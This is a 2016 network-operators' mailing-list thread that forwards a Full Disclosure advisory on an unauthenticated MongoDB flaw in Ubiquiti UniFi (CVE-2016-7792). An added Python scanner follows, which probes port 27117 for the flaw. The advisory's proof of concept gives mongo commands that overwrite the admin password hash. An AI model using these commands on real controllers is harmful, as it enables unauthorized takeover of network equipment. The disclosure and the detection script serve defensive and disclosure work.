Well, this could be pretty crappy if you had an MSP and did layer 3 provisioning like many do and your UniFi server wasn't behind a firewall.
Connecting to the controller via layer 3 is important; connecting to the DB directly sounds dangerous. I am curious why this port is left open? Will have to scan my 5.4.x instances now.

On Oct 3, 2016 4:55 AM, "Adam Moffett" <dmmoff...@gmail.com> wrote:

> People do all kinds of things for all kinds of (dumb) reasons.
>
> The controller's DB would not be accessible on the internet, but any wifi
> user might be able to do the exploit unless you take measures to prevent it.
>
> ------ Original Message ------
> From: "Paul Stewart" <p...@paulstewart.org>
> To: "Animal Farm" <af@afmug.com>
> Sent: 10/3/2016 4:10:28 AM
> Subject: [AFMUG] Fwd: [FD] Critical Vulnerability in Ubiquiti UniFi
>
> Don't have time to test this out but thought I'd pass this along ....
>
> My first thought is why anyone would have their ports exposed across the
> internet to allow this to happen, if it's possibly true....
>
> Paul
>
> Begin forwarded message:
>
> From: Tim Schughart <t.schugh...@prosec-networks.com>
> Subject: [FD] Critical Vulnerability in Ubiquiti UniFi
> Date: September 30, 2016 at 5:49:26 AM EDT
> To: fulldisclos...@seclists.org, bugt...@securityfocus.com, webapp...@securityfocus.com
> Cc: "Khanh Quoc. Pham" <k.p...@prosec-networks.com>
>
> Hello @all,
>
> together with my colleague we found two uncritical vulnerabilities you'll
> find below.
>
> Product: UniFi AP AC Lite
> Vendor: Ubiquiti Networks Inc.
>
> Internal reference: ? (Bug ID)
> Vulnerability type: Incorrect access control
> Vulnerable version: UniFi 5.2.7 and possibly other versions affected (not tested)
> Vulnerable component: Database
> Report confidence: yes
> Solution status: Not fixed by Vendor, the bug is a feature.
> Fixed versions: -
> Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks
> Solution date: -
> Public disclosure: 2016-09-30
> CVE reference: CVE-2016-7792
> CVSSv3: 8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
>
> Vulnerability Details:
> You are able to connect to the access point's database, because of a
> broken authentication (OWASP Top 10). So you are able to modify the database
> and read the data. A possible scenario you'll find in the PoC section.
>
> Risk:
> An attacker gets access to the database and e.g. is able to change the
> admin's password, as you see in the PoC below.
>
> PoC:
> 1. Generate a SHA-512 hash with e.g.
>    mkpasswd -m sha-512
>
> 2. Connect via network to the database, e.g.:
>    mongo --port 27117 --host target_ip
>
> 3. Change the password via the command
>    db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})
>
> 4. Log in via the web interface with the new password
>
> Best regards
>
> Tim Schughart
> CEO / Managing Director
>
> --
> ProSec Networks e.K.
> Ellingshohl 82
> 56077 Koblenz
>
> Website: https://www.prosec-networks.com
> E-Mail: t.schugh...@prosec.networks.com
> Mobile: +49 (0)157 7901 5826
> Phone: +49 (0)261 450 930 90
>
> "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or
> LEGALLY PROTECTED information and is intended only for the named
> recipient(s). Any unauthorized use, dissemination, copying or forwarding is
> strictly prohibited. If you are not the intended recipient and have
> received this email communication in error, please notify the sender
> immediately, delete it and destroy all copies of this E-Mail.
> VAT ID: DE290654714, legal domicile Koblenz, HRA 21625."
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
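The "scan my instances" step the thread talks about, as an added example that is not part of this thread or of the ProSec advisory: a small Python probe that connects to TCP 27117 on each host, sends a MongoDB `listDatabases` command with no credentials over the raw wire protocol (a minimal BSON encoder/decoder plus OP_QUERY/OP_REPLY framing, so no driver is needed), and reports OPEN when the server answers with a database list, AUTH_REQUIRED when it returns MongoDB error code 13, and UNREACHABLE when nothing answers. The hostnames, the sample replies and the sizes in them are constructed for the example; the database name "ace" is an assumption about what a UniFi controller's MongoDB holds.

```python
"""Probe hosts for an unauthenticated MongoDB on the UniFi controller port 27117.
Speaks just enough of the MongoDB wire protocol (BSON, OP_QUERY, OP_REPLY) to run
`listDatabases` with no credentials and classify the answer; no driver needed."""
import socket
import struct

UNIFI_MONGO_PORT = 27117  # port named in the advisory

def bson_encode(doc):
    """Encode a dict (str/int/float/bool/dict/list values) as a BSON document."""
    out = bytearray()
    for key, val in doc.items():
        kb = key.encode() + b"\x00"
        if isinstance(val, bool):              # test before int: bool subclasses int
            out += b"\x08" + kb + (b"\x01" if val else b"\x00")
        elif isinstance(val, int):
            out += b"\x10" + kb + struct.pack("<i", val)
        elif isinstance(val, float):
            out += b"\x01" + kb + struct.pack("<d", val)
        elif isinstance(val, str):
            sb = val.encode() + b"\x00"
            out += b"\x02" + kb + struct.pack("<i", len(sb)) + sb
        elif isinstance(val, dict):
            out += b"\x03" + kb + bson_encode(val)
        elif isinstance(val, list):            # arrays are documents keyed "0", "1", ...
            out += b"\x04" + kb + bson_encode({str(i): v for i, v in enumerate(val)})
        else:
            raise TypeError(f"unsupported BSON value for {key!r}")
    return struct.pack("<i", len(out) + 5) + bytes(out) + b"\x00"

def _num(fmt, buf, p):
    # Unpack one fixed-size little-endian field at buf[p:]; return (value, next p).
    return struct.unpack_from(fmt, buf, p)[0], p + struct.calcsize(fmt)

def bson_decode(buf, pos=0):
    """Decode the BSON document at buf[pos:]; return (dict, offset after it)."""
    size, p = _num("<i", buf, pos)
    doc = {}
    while buf[p] != 0:                         # 0x00 terminates the element list
        tag, p = buf[p], p + 1
        kend = buf.index(b"\x00", p)
        key, p = buf[p:kend].decode(), kend + 1
        if tag == 0x01:
            doc[key], p = _num("<d", buf, p)
        elif tag == 0x02:
            n, p = _num("<i", buf, p)
            doc[key], p = buf[p:p + n - 1].decode(), p + n
        elif tag in (0x03, 0x04):
            sub, p = bson_decode(buf, p)
            doc[key] = list(sub.values()) if tag == 0x04 else sub
        elif tag == 0x08:
            doc[key], p = buf[p] == 1, p + 1
        elif tag == 0x10:
            doc[key], p = _num("<i", buf, p)
        else:
            raise ValueError(f"unsupported BSON type 0x{tag:02x}")
    return doc, pos + size

def op_query(command, request_id=1):
    """Build an OP_QUERY (opcode 2004) running `command` against admin.$cmd."""
    body = (struct.pack("<i", 0) + b"admin.$cmd\x00"            # flags, collection
            + struct.pack("<ii", 0, -1) + bson_encode(command))  # skip, return, query
    return struct.pack("<iiii", 16 + len(body), request_id, 0, 2004) + body

def parse_reply(msg):
    """Return the first document of an OP_REPLY (opcode 1)."""
    if struct.unpack_from("<i", msg, 12)[0] != 1:
        raise ValueError("not an OP_REPLY")
    # header(16) + responseFlags(4) + cursorID(8) + startingFrom(4) + numberReturned(4)
    return bson_decode(msg, 36)[0]

def classify(doc):
    """Map a listDatabases reply to a scan verdict."""
    if doc.get("ok") == 1 and "databases" in doc:
        return "OPEN"             # unauthenticated access: the CVE-2016-7792 condition
    if doc.get("code") == 13:     # MongoDB error code 13 is "Unauthorized"
        return "AUTH_REQUIRED"
    return "ERROR: " + str(doc.get("errmsg", doc))

def probe(host, port=UNIFI_MONGO_PORT, timeout=3.0):
    """Connect to host:port, run listDatabases without credentials, classify it."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(op_query({"listDatabases": 1}))
            msg = s.recv(4)
            total = struct.unpack("<i", msg)[0]   # struct.error if nothing came back
            while len(msg) < total:
                chunk = s.recv(total - len(msg))
                if not chunk:
                    raise ValueError("connection closed mid-reply")
                msg += chunk
            return classify(parse_reply(msg))
    except (OSError, ValueError, struct.error) as e:
        return f"UNREACHABLE ({e})"

def build_reply(doc, request_id=1):
    """Construct an OP_REPLY carrying `doc`, so the parser can be exercised offline."""
    body = struct.pack("<iqii", 0, 0, 0, 1) + bson_encode(doc)
    return struct.pack("<iiii", 16 + len(body), 99, request_id, 1) + body

# Constructed sample replies ("ace" is assumed to be the UniFi database; sizes are made up).
OPEN_REPLY = build_reply({"databases": [{"name": "ace", "sizeOnDisk": 83886080.0, "empty": False}], "ok": 1.0})
DENIED_REPLY = build_reply({"ok": 0.0, "code": 13, "errmsg": "not authorized on admin to execute command"})
```

Run `probe("controller.example.net")` (placeholder name) from a client on the WLAN and again from the internet side; the advisory's CVSS vector is AV:A, and Adam's point is that the WLAN client is the realistic attacker, so a result of OPEN from a wifi segment is the finding to act on, whichever way the internet-facing firewall is set. The probe only reads the database list; it does not touch the `admin` collection the PoC modifies.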